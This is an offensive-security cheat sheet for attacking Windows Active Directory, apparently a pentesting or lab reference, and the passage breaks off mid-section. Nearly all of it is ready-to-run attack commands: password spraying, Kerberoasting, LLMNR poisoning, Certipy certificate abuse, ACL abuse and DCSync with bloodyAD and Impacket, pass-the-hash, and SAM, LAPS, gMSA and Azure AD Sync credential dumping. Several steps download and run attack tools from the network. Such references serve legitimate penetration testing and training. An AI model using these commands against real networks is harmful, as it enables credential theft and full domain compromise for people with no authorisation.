Active Directory

Here you will find a detailed CheatSheet for Active Directory

Enumeration and Exploitation

RPC Enumeration

# Login using a NULL Session with RPCClient
rpcclient -U "" -N <IP> 
# (Authenticated) Login to RPC using RPCClient
rpcclient -U "<User>" <IP>
Password for [WORKGROUP\<User>]: <Pass>
# Commands ->
> enumdomusers             # List domain users
> enumdomgroups            # List domain groups
> queryuser <RID>          # Info about a user (RID from enumdomusers)
> querygroup <RID>         # Info about a group
> querygroupmem <RID>      # Group membership
> getusername              # Current session username
> getdompwinfo             # Password policy
> getdomusers              # Sometimes shows full list (legacy domains)
> srvinfo                  # System info (OS, domain, DC name, etc.)

LDAP Enumeration

# Dump the information using an authenticated user
ldapdomain dump -u '<USER>\<DOMAIN>' -p '<PASS>' <IP>
# Enumerate every information accessible using a NULL Session
ldapsearch -x -H ldap://<IP> -b "dc=<domain>,dc=<domain>"   
# Enumerate domain admins with WinDapSearch
python3 windapsearch.py --dc-ip <IP> -u <USER>@<DOMAIN> -p <PASS> --da
# Enumerate WinDapSearch Privileged users
python3 windapsearch.py --dc-ip <IP> -u <USER>@<DOMAIN> -p <USER> -PU

Kerberos Enumeration

# Enumerate users with kerbrute
kerbrute userenum -d offsec.local --dc <DC-IP> users.txt
# Password Spraying Via Kerberos
 kerbrute passwordspray -d <domain> --dc <DC-IP> users.txt '<Password>'
# AS-Rep Roasting
impacket-GetNPUsers <domain>/ -no-pass -usersfile users.txt -format john
# Kerberoasting
impacket-GetUserSPNs <DOMAIN>/<USER>:<PASS> -request

SMB Enumeration

# User/Password spray over SMB
netexec smb <IP> -u users.txt -p '<PASSWORD>' --no-bruteforce
# List Shares without credentials
netexec smb <target> -u '' -p '' --shares
# List Shares with credentials
netexec smb <target> -u user -p pass --shares
# Extract users, sessions, groups (with creds)
netexec smb <DC-IP> -d <Domain> -u user -p pass --users / --groups / --sessions
# RID Brute (null session)
netexec smb <target> -u '' -p '' --rid-brute
# Dump SAM (if local admin)
netexec smb <target> -u user -p pass --sam
# Enumerating Password Policy (Authenticated)
netexec smb <target> -u user -p pass --pass-pol
# Enumerating overall with enum4linux 
enum4linux-ng -P <IP>

LLMNR/NBT-NS Poisoning — Linux

# Activate responder 
sudo responder -I ens224 
# Crack the NTLMv2 hash
hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt

LLMNR/NBT-NS Poisoning — Windows

# Import  Inveigh.ps1
Import-Module .\Inveigh.ps1
# Poison the interface
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
# Inveigh C# version (Inveigh Zero)
.\Inveigh.exe

User enumeration with Enum4linux

enum4linux -U 172.16.5.5  | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"

Certipy Enumeration

# Setup / find vulnerable templates
certipy-ad find -u USER@DOMAIN.LOCAL -p 'PASS' -dc-ip DC.IP -enabled -vulnerable
# Request cert from vulnerable template (ESC1 / DA access)
certipy-ad req -u USER@DOMAIN.LOCAL -p 'PASS' -dc-ip DC.IP -ca "CA-NAME" -template "VULN-TEMPLATE" -upn administrator@DOMAIN.LOCAL -outfile admin
certipy-ad auth -pfx admin.pfx -domain DOMAIN.LOCAL -dc-ip DC.IP
# HTTP relay to AD CS (ESC8)
certipy-ad relay -ca http://ADCS.SERVER/certsrv/ -template "VULN-TEMPLATE"
# Machine/User cert from valid template
certipy-ad req -u USER@DOMAIN.LOCAL -p 'PASS' -dc-ip DC.IP -ca "CA-NAME" -template "Machine" -machine HOST$ -outfile host
certipy-ad auth -pfx host.pfx -domain DOMAIN.LOCAL -dc-ip DC.IP
# Shadow Credentials (auto)
certipy-ad shadow auto -u USER@DOMAIN.LOCAL -p 'PASS' -dc-ip DC.IP -account <TARGET>

BloodyAD Enumeration

# Setup
bloodyAD -d DOMAIN.LOCAL -u USER -p 'PASS' --host dc01
bloodyAD -d DOMAIN.LOCAL -u USER -p :<NTLM> --host dc01
bloodyAD -d DOMAIN.LOCAL -k -s --host dc01
# Find writable targets
bloodyAD -d DOMAIN.LOCAL -u USER -p 'PASS' --host dc01 get writable --otype USER|COMPUTER|GROUP|OU|GPO|DOMAIN --right ALL|WRITE
# Direct ACL abuse
bloodyAD -d DOMAIN.LOCAL -u USER -p 'PASS' --host dc01 add dcsync <trustee>
bloodyAD -d DOMAIN.LOCAL -u USER -p 'PASS' --host dc01 add genericAll <target> <trustee>
bloodyAD -d DOMAIN.LOCAL -u USER -p 'PASS' --host dc01 add rbcd <TARGET_COMPUTER$> <ATTACKER_SVC$>
bloodyAD -d DOMAIN.LOCAL -u USER -p 'PASS' --host dc01 add shadowCredentials <TARGET> --path ./keys
# Password and principals management
bloodyAD -d DOMAIN.LOCAL -u USER -p 'PASS' --host dc01 set password <USER> 'Passw0rd!'
bloodyAD -d DOMAIN.LOCAL -u USER -p 'PASS' --host dc01 add user <USER> 'Passw0rd!'
bloodyAD -d DOMAIN.LOCAL -u USER -p 'PASS' --host dc01 add computer <HOST$> 'Passw0rd!'
# LAPS and gMSA read
bloodyAD -d DOMAIN.LOCAL -u USER -p 'PASS' --host dc01 get object <HOST$> --attr ms-Mcs-AdmPwd
bloodyAD -d DOMAIN.LOCAL -u USER -p 'PASS' --host dc01 get object <gmsa$> --attr msDS-ManagedPassword
# Groups
bloodyAD -d DOMAIN.LOCAL -u USER -p 'PASS' --host dc01 add groupMember "<GROUP>" <USER>

DCSync

# Must BeDomain Admin or have replication rights (e.g GenericAll)
impacket-secretsdump '<DOMAIN>/<USER>:<PASS>@<IP>'

Pass-TheHash

# PTH With NetExec
netexec smb <target-ip> -u <user> -H <NTLM_hash>
# PTH With Impacket-WMExec
impacket-wmiexec -hashes :<NTLM_hash> <domain>/<user>@<target>
# PTH With Impacket-PSExec
impacket-psexec -hashes :<NTLM_hash> <domain>/<user>@<target>
# PTH With Impacket-SMBClient
impacket-smbclient -hashes :<NTLM_hash> <domain>/<user>@<target>
# PTH With Evil-WinRM
evil-winrm -i <ip> -u <user> -H <NTLM_hash>

WinRM

# Authenticated login in WinRM
evil-winrm -i <IP> -u <user> -p <pass>
# Login with certificates
evil-winrm -i <IP> -c <cert.pem> -k <key.pem>

Enumeration with BloodHound-python

# Import scan into a zip file
bloodhound-python -u '<USER>' -p '<PASS>' -ns <IP> -d <DOMAIN> -c all --zip

Enumeration with BloodHound

# Run BloodHound dashboard
sudo bloodhound
# Upload SharpHound
sharphound
# Run SharpHound on the victim
.\SharpHound.exe -c All
# Download the .zip file and then upload it on the "Ingest" menu on the BH dashboard

Internal password spraying — Windows

# Download the ps1 script
wget https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/refs/heads/master/DomainPasswordSpray.ps1
# Import the module
Import-Module .\DomainPasswordSpray.ps1
# Invoke the attack
Invoke-DomainPasswordSpray -Password <PASS> -OutFile spray_success -ErrorAction SilentlyContinue

Privilege Escalation

SeBackupPrivilege Abuse

# If user got
whoami /priv
...
Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled

# You can copy the SAM or the SYSTEM
> reg save hklm/sam C:\Temp\sam.hive
> reg save hklm/system C:\Temp\system.hive

# And exploiting with impacket
impacket-secretsdump -sam sam.hive -system system.hive LOCAL 

Winpeas

# Download WinPEASx64.exe
wget https://github.com/peass-ng/PEASS-ng/releases/download/20250701-bdcab634/winPEASx64.exe
# Execute it on the target
. .\WinPEASx64.exe

Microsoft Azure AD Sync

# Download AdDecrypt.zip 
wget https://github.com/VbScrub/AdSyncDecrypt/releases/download/v1.0/AdDecrypt.zip
# Upload it to the victim machine
*Evil-WinRM* PS C:\Temp> upload mcrypt.dll
*Evil-WinRM* PS C:\Temp> upload AdDecrypt.exe
# Move to the target directory
cd "C:\Program Files\Microsoft Azure AD Sync\Bin"
# Execute the exploit
C:\Temp\AdDecrypt.exe -FullSQL

Enumerating Security Controls

# Check Windows Defender Status
Get-MpComputerStatus
# Enumerate AppLocker
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
# Enumerate Language Mode
$ExecutionContext.SessionState.LanguageMode
# Enumerating LAPS
Find-LAPSDelegatedGroups
# Check rights with LAPS enabled
Find-AdmPwdExtendedRights
# Search computers that have LAPS enabled
Get-LAPSComputers

Authenticated enumeration from powershell

# Discover modules
Get-Module
# Load AD module
Import-Module ActiveDirectory
# Get domain Info
Get-ADDomain
# Get user info
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
# Check Trust relationships
Get-ADTrust -Filter *
# Enumerate groups
Get-ADGroup -Filter * | select name
Get-ADGroup -Identity "Backup Operators"
# Enumerate group membership
Get-ADGroupMember -Identity "Backup Operators"

PowerView commands

# Import PowerView.ps1 module
Import-Module .\PowerView.ps1
# Domain info
Get-Domain
Get-DomainController
# Users / Groups / Memberships
Get-DomainUser
Get-DomainGroup
Get-DomainGroupMember -Identity "Domain Admins"
# SPN / Kerberoasting
Get-DomainSPNTicket -username svc-account
# ACLs (Privilege escalation paths)
Find-InterestingDomainAcl
# Shares / Sessions / Local admins
Find-DomainShare
Get-NetSession -ComputerName target
Find-LocalAdminAccess
# Trusts
Get-DomainTrustMapping
Get-ForestTrust
# Convert user to SID
ConvertTo-SID -Name "user"
# Test if an user has administrative access
Test-AdminAccess -ComputerName <target>
# Kerberoasting - enumerate users
Get-DomainUser * -spn | select samaccountname
# Target the specific user and retrieve TGT
Get-DomainUser -Identity <user> | Get-DomainSPNTicket -Format john/hashcat
# Export all tickets to a CSV file
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat/John | Export-Csv .\hashes.csv -NoTypeInformation

Snaffler

# Download from https://github.com/SnaffCon/Snaffler
# Execute Snaffler
.\Snaffler.exe -s -d <domain> -o snaffler.log -v data

Basic Enumeration Commands — Windows

# Print PC's name
hostname
# Print OS Version 
[System.Environment]::OSVersion.Version
# Print patches and hotfixes applied to the host
wmic qfe get Caption,Description,HotFixID,InstalledOn
# Display all list of environment variables 
set
# Check the firewall
netsh advfirewall show allprofiles
# Check Windows defender
sc query windefend
# List all known hosts
arp -a
# Print the routing table
route print
# Enumerate host's security configuration
Get-MpComputerStatus | Select AMProductVersion
# Enumerate administrator accounts
Get-LocalGroupMember -Group "Administrators"
# List all domain users with their Enabled status and Description
Get-ADUser -Filter * -Properties Description, Enabled | Select SamAccountName, Enabled, Description
# Enumerate RDP Access
Get-NetLocalGroupMember -ComputerName <Computer> -GroupName "Remote Desktop Users"
# Enumerate WinRM
Get-NetLocalGroupMember -ComputerName <Computer> -GroupName "Remote Management Users"

LAPS Abuse

# Clone the repository 
git clone https://github.com/ztrhgf/LAPS/tree/master/AdmPwd.PS
# Import the module
Import-Module ./AdmPwd.PS.psd1
# Check what objects can manage LAPS
Find-AdmPwdExtendedRights -identity *
# Retrieve the password for a computer
get-admpwdpassword -computername <Computer name> | Select password

ACE Abuse

+------------------------+------------------------------------------------+-------------------------------------------------------------+
|       Permission       |              Abused With                       |                  Enables Attack(s)                          |
+------------------------+------------------------------------------------+-------------------------------------------------------------+
| ForceChangePassword    | Set-DomainUserPassword                         | Reset target user password                                  |
| Add Members            | Add-DomainGroupMember                          | Add user to privileged group                                |
| GenericAll             | Set-DomainUserPassword / Add-DomainGroupMember | Full control (reset password, Kerberoasting, add to group)  |
| GenericWrite           | Set-DomainObject                               | Add SPN (Kerberoasting), add user to group, RBCD setup      |
| WriteOwner             | Set-DomainObjectOwner                          | Take ownership of object, escalate to full control          |
| WriteDACL              | Add-DomainObjectACL                            | Grant privileges (e.g. GenericAll) to another user          |
| AllExtendedRights      | Set-DomainUserPassword / Add-DomainGroupMember | Reset password or modify group membership                   |
| AddSelf                | Add-DomainGroupMember                          | Add self to group with elevated rights                      |
+------------------------+------------------------------------------------+-------------------------------------------------------------+

ACL Enumeration

# (Needs PowerView)
# Enumerate ACLs
Find-InterestingDomainAcl
# Get current user SID
$sid = Convert-NameToSid username
# Enumerate all ACLs where user has permissions in
Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
# Create a list of domain users
Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt
# Perform a reverse search to a GUID
$guid = <"guid">
Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * |Select Name,DisplayName,DistinguishedName,rightsGuid| ?{$_.rightsGuid -eq $guid} | fl
# Resolve GUID
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid} 
# Further enumeration using a user
$sid2 = Convert-NameToSid <user>
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid2} -Verbose

ACL Abuse

# (Needs PowerView)
# Create a PSCredential Object
$SecPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $SecPassword)